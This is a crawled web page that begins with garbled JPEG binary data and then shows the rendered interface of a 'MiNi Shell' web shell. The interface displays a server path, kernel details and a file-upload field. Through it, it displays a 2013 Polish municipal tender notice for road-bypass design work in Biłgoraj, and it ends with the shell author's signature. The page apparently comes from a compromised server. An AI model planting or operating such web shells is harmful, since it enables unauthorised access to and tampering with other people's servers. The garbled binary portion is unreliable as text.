JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130308/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130308/35783-N-2013.html

<p class="kh_header"><b>Biłgoraj: Wykonanie kompletnej dokumentacji projektowej w studium projektu budowlanego i wykonawczego dla zadania pn:
 Budowy obwodnicy m. Biłgoraj w ciągu drogi wojewódzkiej nr 835 Lublin - Grabownica Starzeńska</b><br>
<b>Numer ogłoszenia: 35783 - 2013; data zamieszczenia: 08.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Biłgoraj , Plac  Wolności 16, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6869600, faks 84 6869665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bilgoraj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kompletnej dokumentacji projektowej w studium projektu budowlanego i wykonawczego dla zadania pn:
 Budowy obwodnicy m. Biłgoraj w ciągu drogi wojewódzkiej nr 835 Lublin - Grabownica Starzeńska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Wykonanie kompletnej dokumentacji projektowej dla Budowy obwodnicy m. Biłgoraj w ciągu drogi wojewódzkiej nr 835 Lublin - Grabownica Starzeńska
Przedmiot zamówienia obejmuje zakres: 
1.2.   Składowe Dokumentacji
W ramach zleconej dokumentacji projektowej, należy opracować następujące stadia i elementy:
-	Projekt budowlany (PB) - z uzgodnioną wersją z Zamawiającym - po 8kpl.
-	Projekt Wykonawczy (PW) - po 6kpl.
-	Kosztorysy inwestorskie, ofertowe, przedmiary i SST - po 4kpl.
1.2.1.	Projekt budowlany (PB) branży drogowej wraz z opiniami, uzgodnieniami, decyzjami niezbędnymi do uzyskania decyzji o zezwoleniu na realizacje inwestycji drogowej zgodnie z ustawą [2] i obowiązującymi przepisami ustawy[1]. 
1.2.2.	Projekt wykonawczy (PW) branży drogowej wraz z:
a.	Kosztorysem   inwestorskim   sporządzony   metodą   szczegółową   z   podaniem
podstawy i SST.
b.	Kosztorysem ofertowym.
c.	Przedmiarem robót
d.	Szczegółową Specyfikacją Techniczną (SST).
1.2.3.	Projekt budowlany (PB) branży elektrycznej (budowa oświetlenia drogowego) wraz z opiniami, uzgodnieniami, decyzjami niezbędnymi do uzyskania decyzji o zezwoleniu na realizacje inwestycji drogowej zgodnie z ustawą 2 i obowiązującymi przepisami ustawy[1]. 
1.2.4.	Projekt wykonawczy (PW) branży elektrycznej (budowa oświetlenia drogowego)
wraz z:
a.	Kosztorysem   inwestorskim   sporządzony   metodą   szczegółową   z   podaniem
podstawy i SST.
b.	Kosztorysem ofertowym.
c.	Przedmiarem robót
d.	Szczegółową Specyfikacją Techniczną (SST).

1.2.5.	Projekt budowlany (PB) branży mostowej - (mosty i przepusty) wraz z opiniami,
uzgodnieniami, decyzjami niezbędnymi do uzyskania decyzji o zezwoleniu na
realizacje inwestycji drogowej zgodnie z ustawą [2] i obowiązującymi przepisami ustawy1. 
1.2.6.	Projekt wykonawczy (PW) branży mostowej - (mosty i przepusty) wraz z:
a.	Kosztorysem   inwestorskim   sporządzony   metodą   szczegółową   z   podaniem
podstawy i SST.
b.	Kosztorysem ofertowym.
c.	Przedmiarem robót.
d.	Szczegółową Specyfikacją Techniczną (SST).

1.2.7 Projekt budowlany (PB) rozbudowy i przebudowy kanalizacji deszczowej wraz z opiniami,
uzgodnieniami, decyzjami niezbędnymi do uzyskania decyzji o zezwoleniu na
realizacje inwestycji drogowej zgodnie z ustawą [2] i obowiązującymi przepisami ustawy[1]. 
1.2.8.	Projekt wykonawczy (PW) rozbudowy i przebudowy kanalizacji deszczowej wraz z:
a.	Kosztorysem   inwestorskim   sporządzony   metodą   szczegółową   z   podaniem
podstawy i SST.
b.	Kosztorysem ofertowym.
c.	Przedmiarem robót.
d.	Szczegółową Specyfikacją Techniczną (SST).
1.2.9.	Projekty budowlane (PB] i wykonawcze (PW) pozostałych branż kolidujących z
rozbudowywaną drogą, w tym między innymi: branży gazowej, energetycznej,
telekomunikacyjnej, sanitarnej itp. wraz z opiniami, uzgodnieniami, decyzjami
niezbędnymi do uzyskania decyzji o zezwoleniu na realizacje inwestycji drogowej
zgodnie z ustawą [2] i obowiązującymi przepisami ustawy[1]. 
a.	Kosztorysem   inwestorskim   sporządzony   metodą   szczegółową   z   podaniem
podstawy i SST.
b.	Kosztorysem ofertowym.
c.	Szczegółową Specyfikacją Techniczną (SST).

1.2.10.  Planszę zbiorczą uzbrojenia terenu (wszystkie branże}.
1.2.11. Projekt stałej organizacji ruchu zatwierdzony przez właściwy organ zarządzający ruchem, wraz z:
a.	Kosztorysem   inwestorskim   sporządzony   metodą   szczegółową   z   podaniem
podstawy i SST.
b.	Kosztorysem ofertowym.
c.	Przedmiarem robót
d.	Szczegółową Specyfikacją Techniczną (SST).
1.2.12. Projekt tymczasowej organizacji ruchu, zatwierdzony przez organ zarządzający ruchem   dla branż: drogowej, mostowej-przepusty, gazowej, energetycznej, telekomunikacyjnej i sanitarnej itd.
1.2.13. Szczegółową inwentaryzację zadrzewienia wraz z planem wyrębu .
1.2.14.  Projekt wykonawczy nasadzeń zieleni wraz z:
a.	Kosztorysem inwestorskim sporządzony metodą szczegółową   z   podaniem
podstawy i SST.
b.	Kosztorysem ofertowym.
c.	Przedmiarem robót.
d.	Szczegółową Specyfikacją Techniczną (SST).
1.2.15.	Projekt wyburzeń i rozbiórek (jeżeli będzie wymagany).
W ramach projektu należy wykonać szczegółową inwentaryzację obiektów budowlanych przewidzianych do wyburzenia oraz opracować program prac rozbiórkowych z opracowaniem dok. techn. umożliwiającej uzyskanie niezbędnego pozwolenia lub zgłoszenia rozbiórki wraz z;
a.	Kosztorysem   inwestorskim   sporządzony   metodą   szczegółową   z   podaniem
podstawy i SST.
b.	Kosztorysem ofertowym.
c.	Przedmiarem robót.
d.	Szczegółową Specyfikacją Techniczną (SST).
1.2.16.	Dokumentacja geotechniczna - dla rozpoznania warunków gruntowo-wodnych dla potrzeb ustalenia geotechnicznych warunków posadowienia drogi zgodnie z  [7.4], [7.3], [7.2], [7.1].
1.2.17.	Dokumentacja geologiczno-inżynierska - dla rozpoznania warunków gruntowo-wodnych. Dla wszystkich obiektów budowlanych, dla których wymagana jest dokumentacja geologiczno-inżynierska, należy opracować wymaganą dokumentację dla potrzeb ustalenia geotechnicznych warunków ich posadowienia - zgodnie z [7.4], [7.3], [7.2], [7.1].
1.2.18. Wszystkie niezbędne materiały do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) - związana z nabywaniem nieruchomości i z czasowym korzystaniem z nieruchomości (PODZIAŁY NIERUCHOMOŚCI), a w szczególności:
a.	komplet dokumentów i materiałów do opinii, zgodnie z art. llb ustawy [2]
b.	komplet dokumentów i materiałów do wniosku, zgodnie z art. 11d ustawy [2] - w
tym projektu budowlanego wraz z oświadczeniem, o którym mowa w art.12 ust.7
ustawy [1], aktualnym na dzień opracowania projektu.
Projekt budowlany powinien spełniać wymagania art. 34 ustawy [1] oraz [1.1]:
a.	wniosek wraz z opisem inwestycji (wersja elektroniczna),
b.	jednostkowe mapy z projektem podziału nieruchomości,
c.	wykaz działek wchodzących w skład projektowanego pasa drogowego (istniejące +
wydzielone pod pas).
1.2.19. Wniosek z materiałami, opiniami wg art. llb ustawy 2 oraz pozwoleniami wodno-prawnymi, do uzyskania decyzji ZRID wg art. 11d ustawy [2] oraz dodatkowo 8 egz. map, o której mowa w art. 11d pkt.l) ww. ustawy.
1.2.20. Mapa do celów projektowych - Zleca Zamawiający i przekaże Wybranemu Wykonawcy w wersji numerycznej i 2-egz. wersji papierowej.


Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 3 do  SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.23.00-4, 70.00.00.00-1, 90.72.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca starający się o zamówienie jest zobowiązany wnieść wadium przed upływem terminu składania ofert. 
Wysokość wadium: 
4 000,00 - PLN (słownie: cztery tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie realizacji usług stanowiących przedmiot zamówienia, tj. zrealizował w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 2 zamówienia polegające na wykonaniu dokumentacji projektowej na budowę, przebudowę dróg, ulic wraz z uzbrojeniem technicznym wod-kan, gazowym, wykonaniem sieci i instalacji urządzeń elektrycznych i elektroenergetycznych o wartości każdego nie mniejszej niż 250.000,00 zł.

Spełnienie ww. warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu, określonego w pkt 6.1.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 7 do SIWZ       i załączonych dokumentów potwierdzających, że wymienione w nim roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.3  Osoby zdolne do wykonania zamówienia
Wykonawca musi wykazać, że dysponuje co najmniej po jednej osobie, która zgodnie z wymogami art. 12 ustawy z 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243 poz. 1623 ze zm.) może pełnić samodzielną funkcję techniczną w budownictwie tj.
5.3.1. Projektant: z  uprawnieniami budowlanymi do projektowania w specjalności
         budowy dróg.
5.3.2. Projektant: z  uprawnieniami budowlanymi do projektowania w specjalności
         instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i
         elektroenergetycznych.
5.3.3. Projektant: z  uprawnieniami budowlanymi do projektowania w specjalności
         instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,
         gazowych, wodociągowych i kanalizacyjnych.
5.3.4. Projektant: z  uprawnieniami budowlanymi do projektowania w specjalności
         konstrukcyjno-budowlanej.
Uprawnienia budowlane do projektowania we wszystkich specjalnościach winny być bez ograniczeń (lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów).
W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych 
zdobyte w innych państwach, uznane w myśl art.12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2010 r. nr 243, poz.1623 ze zm.).  


Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w ofercie oświadczenia wykonawcy (wg wzoru stanowiącego załącznik nr 8 do SIWZ), że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zestawienie kosztów opracowania 
 Potwierdzenie wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, polegających na:
1) zmianie terminu wykonania umowy w przypadku gdy:
a)	zachodzi konieczność dostosowania postanowień umowy do zmian wynikających 
z nowelizacji powszechnie obowiązujących przepisów prawa z uwagi na brak możliwości realizacji umowy wedle pierwotnej jej treści lub z uwagi na rażącą stratę grożącą jednej ze stron;
b)	wystąpiła niezgodność pomiędzy częścią opisową a kartograficzną ewidencji gruntów w obszarze, którego dotyczy projektowana inwestycja;
c)	przedłużeniu uległy procedury na etapie wydawania opinii, uzgodnień, postanowień         i decyzji administracyjnych;
d)	wystąpiły zamówienia dodatkowe niezbędne do prawidłowego wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin realizacji zamówienia;
e)	zmianie uległy przepisy prawne powodujące konieczność modyfikacji opisu przedmiotu zamówienia i wynikającą stąd pracochłonność czynności;
f)	zaistniała konieczność wykonania badań archeologicznych w ściśle określonym terminie;
g)	w przypadku wniesienia przez wykonawcę/wykonawców, po upływie terminu składania ofert odwołania do Prezesa Krajowej Izby Odwoławczej. Termin wykonania umowy wydłuża się o liczbę dni odpowiadającą okresowi zawieszenia terminu związania ofertą.
2)	zmianie wynagrodzenia umowy w przypadku, gdy:
a)	wystąpiły zamówienia dodatkowe niezbędne do prawidłowego wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin realizacji zamówienia;
b)	zachodzi konieczność dostosowania postanowień umowy do zmian wynikających z nowelizacji powszechnie obowiązujących przepisów prawa z uwagi na brak możliwości realizacji umowy wedle pierwotnej jej treści lub z uwagi na rażącą stratę grożącą jednej ze stron;
c)	zmianie uległy stawki podatku VAT
3)	zmianach  osobowych w przypadku gdy:
a)	z uwagi na niezależne od stron okoliczności (tj. choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne) nastąpiła lub powinna nastąpić zmiana osób kluczowych dla realizacji umowy np. koordynatora prac, projektanta itp. oraz osób reprezentujących strony;
4)	zmianach redakcyjnych umowy w przypadku gdy:
a)	nastąpi zmiana danych stron ujawnionych w rejestrach publicznych oraz zmiany dotyczące wskazania stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.bilgoraj.pl.- zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Biłgoraj,
Plac Wolności 16
23-400 Biłgoraj.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2013 godzina 09:00, miejsce: Urząd Miasta Biłgoraj,
Plac Wolności 16
23-400 Biłgoraj 
pok. 13,(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie będzie współfinansowane ze śodkow Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwoju Polski Wschodniej 2007-2013, Oś Prrorytetowa IV Inrastruktura Transportowa, Działanie IV.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com